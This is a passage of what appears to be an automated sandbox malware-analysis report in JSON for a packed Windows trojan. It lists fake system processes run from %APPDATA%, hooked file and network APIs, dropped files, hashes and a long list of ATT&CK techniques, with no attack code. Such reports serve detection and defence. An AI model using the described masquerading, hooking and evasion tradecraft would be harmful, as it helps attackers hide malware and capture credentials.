\"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004408)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000500)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001584)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000884)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002164)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000284)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002472)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004448)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004444)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003268)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001216)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003452)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003824)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001352)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003856)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001708)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003640)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001020)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000576)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00000580)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360
https://hybrid-analysis.com/sample/208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360
Hybrid Analysis - Killers
{"size": 335872, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "av_detect": 89, "vx_family": "Malware.SPfVo.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 5, "total_signatures": 238, "extracted_files": [{"name": "ntbootdd.exe", "file_path": "%WINDIR%\\ntbootdd.exe", "file_size": 335872, "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "ntbootdd.exe (PID: 5888)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "ntbootdd.exe.bin", "file_size": 335872, "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "10-02-2025", "file_path": "%WINDIR%\\Logs\\%OSUSER%\\10-02-2025", "file_size": 603, "sha256": "fafb5ba23fa59228ba4b0341de83fd16d67ab592365ebeba82711743c4ef1c68", "type_tags": ["data"], "description": "data", "runtime_process": "ntbootdd.exe (PID: 5888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006128", "name": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe", "normalized_path": "C:\\208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe", "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00005888", "parentuid": "00000000-00006128", "name": "ntbootdd.exe", "normalized_path": "%WINDIR%\\ntbootdd.exe", "command_line": "-bs", "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00003108", "name": "ntbootdd.exe", "normalized_path": "%WINDIR%\\ntbootdd.exe", "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00003788", "name": "ntbootdd.exe", "normalized_path": "%WINDIR%\\ntbootdd.exe", "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00004420", "name": "ntbootdd.exe", "normalized_path": "%WINDIR%\\ntbootdd.exe", "sha256": "208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360", "av_label": "Trojan.Mepaow", "av_matched": 16, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 17}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", 